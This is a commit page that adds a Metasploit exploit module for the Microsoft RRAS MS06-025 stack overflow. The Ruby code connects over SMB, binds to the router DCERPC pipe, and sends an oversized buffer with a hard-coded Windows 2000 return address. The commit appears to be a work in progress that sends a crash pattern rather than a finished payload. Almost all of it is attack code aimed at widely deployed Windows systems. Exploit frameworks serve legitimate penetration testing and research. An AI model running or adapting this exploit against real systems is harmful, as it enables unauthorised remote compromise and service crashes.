Wee
git-svn-id: file:///home/svn/incoming/trunk@3661 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
d89f5fa9d1
commit
372edb7957
|
|
@ -0,0 +1,103 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::DCERPC
|
||||
include Exploit::Remote::SMB
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft RRAS MS06-025 Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the RRAS
|
||||
service shipped with each version of Windows. This
|
||||
vulnerability is not accessible to anonymous users
|
||||
on any platform other than Windows XP SP1.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'MSB', 'MS06-025'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "",
|
||||
'Compat' =>
|
||||
{
|
||||
# -ws2ord XXX?
|
||||
},
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows 2000 TEST',
|
||||
{
|
||||
'Ret' => 0x767a38f6, # umpnpmgr.dll
|
||||
}
|
||||
]
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 13 2006'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use (router, srvsvc)", 'router']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
connect()
|
||||
smb_login()
|
||||
|
||||
handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
|
||||
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
|
||||
str = [1, 0x49].pack('VV') + Rex::Text.pattern_create(0x4000) + "\x00"
|
||||
|
||||
stubdata =
|
||||
# [1, ... and [2, ... result in different crashes...
|
||||
[1, str.length, 0, str.length].pack('VVVV') + str + NDR.long(str.length)
|
||||
|
||||
begin
|
||||
dcerpc.call(0x0C, stubdata)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
print_good('server did not respond, this is expected')
|
||||
rescue => e
|
||||
if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
|
||||
print_good('server disconnected, this is expected')
|
||||
else
|
||||
raise e
|
||||
end
|
||||
else
|
||||
print_status('should be owned now...')
|
||||
end
|
||||
|
||||
# Cleanup
|
||||
handler
|
||||
disconnect
|
||||
|
||||
p dcerpc.last_response.stub_data
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
Loading…
Reference in New Issue